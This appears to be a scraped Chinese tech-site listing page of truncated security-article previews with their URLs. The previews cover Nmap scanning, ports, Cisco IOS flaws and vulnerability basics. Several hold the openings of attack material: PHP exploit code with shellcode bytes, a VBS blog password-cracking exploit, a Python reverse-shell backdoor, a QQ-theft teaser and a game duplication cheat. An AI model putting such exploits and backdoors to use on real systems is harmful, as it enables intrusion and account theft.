可以这样说,如果你的网络存有漏洞,或者说你的防火墙有漏洞,或者说你的服务器开着不该开放的端口,那你的网络面临着被攻击、被损害的风险。先下手为强。为防止别人毁掉自己的网络,先对自己“狠”一点。我们可以用黑客们采用的方法先测试一下自己的系统。工欲善其事,必先利其器。应该选择什么工具呢?这里我们推荐Nmap。Nmap是一个免费的开源实用程序,它可以对网络进行探查和安全审核。许多网络管理人员还发现它对于网络的设备调查、管理服务升级计划、监视主机或服务的正常运行时间。Nmap使用IP数据包来决定有哪些主机在网络中是可用的,这些主机正提供的服务有哪些,它们运行的操作系统是什么,使用了哪些类型的过滤器或防火...
http://www.jb51.net//article/12817.htm
根据易观国际发布《2007年第2季度中国即时通讯市场季度监测》报告显示,中国活跃的IM软件账号已经达到了3.76亿个,其中拥有2.9亿活跃用户账号的腾讯QQ是当之无愧的IM王者。可是你知道吗,你的QQ现在很危险了! 不需要什么高超的技巧,黑客就可以轻松地盗取你的QQ。想知道他们是怎么做的以及该如何避免自己的QQ被盗吗?快随小编一起看看QQ场景漏洞的破解之法(属于0DAY漏洞)。 月黑风高夜,黑客挖出了一个宝箱,里面盛放着光彩夺目的“QQ场景漏洞”。他们惊奇的发现,不需要有什么高超的技巧,只要懂一点基本的脚本代码编写,就可以轻松地盗取别人的QQ、秘密安装监控软件或破坏系统等。于是...
http://www.jb51.net//article/12496.htm
[code]<?php if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");} $scode = "\xfc\xbb\xc7\xc4\x05\xc9\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85". "\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x3b\x2c\x41\xc9\xc3\xad\xc1". "\x8c\xff\x26...
http://www.jb51.net//article/12451.htm
在上网的时候,我们经常会看到“端口”这个词,也会经常用到端口号,比如在FTP地址后面增加的“21”,21就表示端口号。那么端口到底是什么意思呢?怎样查看端口号呢?一个端口是否成为网络恶意攻击的大门呢?,我们应该如何面对形形色色的端口呢?下面就将介绍这方面的内容,以供大家参考。 21端口:21端口主要用于FTP(FileTransferProtocol,文件传输协议)服务。 端口说明:21端口主要用于FTP(FileTransferProtocol,文件传输协议)服务,FTP服务主要是为了在两台计算机之间实现文件的上传与下载,一台计算机作为FTP客户端,另一台计算机作为FTP服务器,...
http://www.jb51.net//article/12267.htm
日前Cisco针对部分交换器的特定IOS(InternetworkOperatingSystem)版本提出漏洞通知,也就是Cisco发现,特定版本的IOS,当用户启动FTP或者是Telnet动作时,只要同时搭配认证动作,有可能发生远端资料缓冲区溢出的异常状况,因此建议用户可以透过更新IOS软体版本来解决,或者是关闭FTP与Telnet时会同步启动认证的设定,一样也可以避免该网路漏洞的发生。不过,如果用户是透过HTTP或HTTPS来启动认证动作的话,便不会发生问题。 其实IOS发生网路安全漏洞,早就不是意料之外的问题,因为Cisco的IOS功能相当多,而且都跟网路相关连结方式作整合,要不发...
http://www.jb51.net//article/12033.htm
安全研究员迈克尔·林恩(MichaelLynn)从ISS(互联网安全系统)公司辞职后,不顾思科及ISS公司的阻挠,上周三在黑帽安全会议上演示了如何利用漏洞攻击和控制思科的路由器,在业内激起轩然大波,思科和ISS的公众形象也一落千丈。会议结束第二天,林恩与思科及ISS达成和解协议,他同意删除有关这一漏洞的研究资料,不泄露实现这一攻击的具体方法,不再散布他的演示稿。(事实上,林恩演示时用的长达35页的的幻灯片《TheHolyGrail:CiscoIOSShellcodeAndExploitationTechniques》(《圣杯:思科IOS操作系统Shell代码及攻击技术》)已经以PDF文件形式在...
http://www.jb51.net//article/12020.htm
受影响的系统: CiscoIOS9.14 CiscoIOS12.0.7 CiscoIOS12.0.6 CiscoIOS12.0.5 CiscoIOS12.0.4T CiscoIOS12.0.4S CiscoIOS12.0.4 CiscoIOS12.0.3T2 CiscoIOS12.0.2XG CiscoIOS12.0.2XF CiscoIOS12.0.2XD CiscoIOS12.0.2XC CiscoIOS12.0.2 CiscoIOS12.0.1XE CiscoIOS12.0.1XB CiscoIOS12.0.1XA3 CiscoIOS12.0.1W C...
http://www.jb51.net//article/11907.htm
0.98版本漏洞=======★★★关于0.98c的复制方法★★★=====复制必须要两个人,假如主角是A对方是BA按ESC键B交易A交易两次第二次交易要在第一次交易取消以后等B交易完之后A先点OK再点取消然后把要复制的东西放入仓库接着A回来交易BB点OKA走开复制成功你会发现你放到仓库的东西又重新出现在你的包裹里注意:不要把复制的东西和真品同时放在包裹或者仓库,不然后果不堪设想不信你们自己可以试试如果有人知道0.98c怎么刷卓越全属性装备请加我QQ8549128请告之,谢谢!三连击决斗系统所设定的60%普通攻击有效,再加上战士COMBO的三连击想想是多么恐怖,一个天地十字剑+霹雳回旋+袭风刺...
http://www.jb51.net//article/11672.htm
呵呵,只是证明下漏洞存在exp如下,保存为vbs,自己下个程序测试自己吧'From 剑心'============================================================================'使用说明:' 在命令提示符下:' cscript.exe lbsblog.vbs 要攻击的网站的博客路径 有效的文章id 要破解的博客用户密码'如:' cscript.exe lbsblog.vbs www.xxxx.com/blog/ 1&nb...
http://www.jb51.net//article/11136.htm
不知道怎么忽然想看这个,呵呵小我的python的反shell的代码#!/usr/bin/python# Python Connect-back Backdoor# Author: wofeiwo <wofeiwo[0x40]gmail[0x2e]com># Version: 1.0# Date: July 15th 2006import sysimport osimport socketshell = "/bin/...
http://www.jb51.net//article/11135.htm
作者:Mark Vogels 翻译:黯魂[S.S.T] 在这篇文档中,我将会试着为你提供一个对于错误,和由于那些错误而产生的漏洞以及它们的exploits的基本认识。那决不意味着能让你完全理解exploits和漏洞,但是能帮助你学会认识可能的漏洞以及怎样处理它们。 一般而言有3种不同类型的错误会可能危及计算机系统和网络的安全。 #编程错误 #配置错误 #设计错误 错误可以被看成是失误,尽管它们并非都是由事故导致的。软件/设备的最初创建者可能就存在错误,用最好的想法却创建了错误,并且没有意识到它可能就是一个潜在的威胁...
http://www.jb51.net//article/10387.htm